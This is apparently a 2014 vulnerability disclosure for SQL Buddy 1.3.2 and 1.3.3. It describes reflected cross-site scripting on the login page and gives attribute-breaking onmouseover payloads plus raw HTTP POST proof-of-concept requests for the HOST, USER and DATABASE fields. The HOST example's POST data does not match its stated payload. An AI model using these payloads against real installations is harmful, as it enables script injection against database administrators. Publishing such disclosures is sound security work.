Sqlbuddy versions 1.3.2 and 1.3.3 suffer from a reflective cross site scripting vulnerability.
c03dd069f7f44d259ec27c3128ecdb5bcb085ac70d888a16525eac72a1d4180d
##################################################################################################
#
#Exploit Title : Sqlbuddy 1.3.2 & 1.3.3 Reflected Cross-Site Scripting
#Author : Govind Singh aka NullPort
#Vendor : http://sqlbuddy.com/
#Download Link : https://github.com/calvinlough/sqlbuddy/raw/gh-pages/sqlbuddy.zip (Sqlbuddy 1.3.3)
#Date : 14/07/2014
#Discovered at : IHT Lab ( 1ND14N H4X0R5 T34M )
#Love to : Manish Tanwar, DeadMan India, Hardeep Singh, Amit Kumar Achina , Jitender Dangi
#Greez to : All IHT Members
#
###################################################################################################
about vendor :
SQL Buddy is an open source web based application written in PHP intended to handle the administration of MySQL and SQLite with the use of a Web browser.
The project places an emphasis on ease of installation and a simple user interface.
Cross-Site Scripting vulnerability in "login.php" page with parameter "DATABASE" "HOST" & "USER"
=========== ===========================
HOST Payload : localhost" onmouseover=prompt(955794) bad="
PoC :
Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/sqlbuddy/login.php
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=101
POSTDATA=ADAPTER=mysql&HOST=01/01/1967%22%20onmouseover%3dprompt(906831)%20bad%3d%22&USER=root&PASS=&DATABASE=
-----------------------------------------------------------------------------------------------------------------
USER payload : root" onmouseover=prompt(959474) bad="
PoC :
Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/sqlbuddy/login.php
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=93
POSTDATA=ADAPTER=mysql&HOST=01%2F01%2F1967&USER=root" onmouseover=prompt(959474) bad="&PASS=&DATABASE=
----------------------------------------------------------------------------------------------------------------------
DATABASE pyaload : 01/01/1967" onmouseover=prompt(906831) bad="
PoC :
Host=localhost
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/sqlbuddy/login.php
Cookie=PHPSESSID=c38l3ugid396b5g9fbeeg4qba2
Connection=keep-alive
Content-Type=application/x-www-form-urlencoded
Content-Length=98
POSTDATA=ADAPTER=mysql&HOST=localhost&USER=root&PASS=&DATABASE=01/01/1967" onmouseover=prompt(906831) bad="
------------------------------------------------------------------------------------------------------------------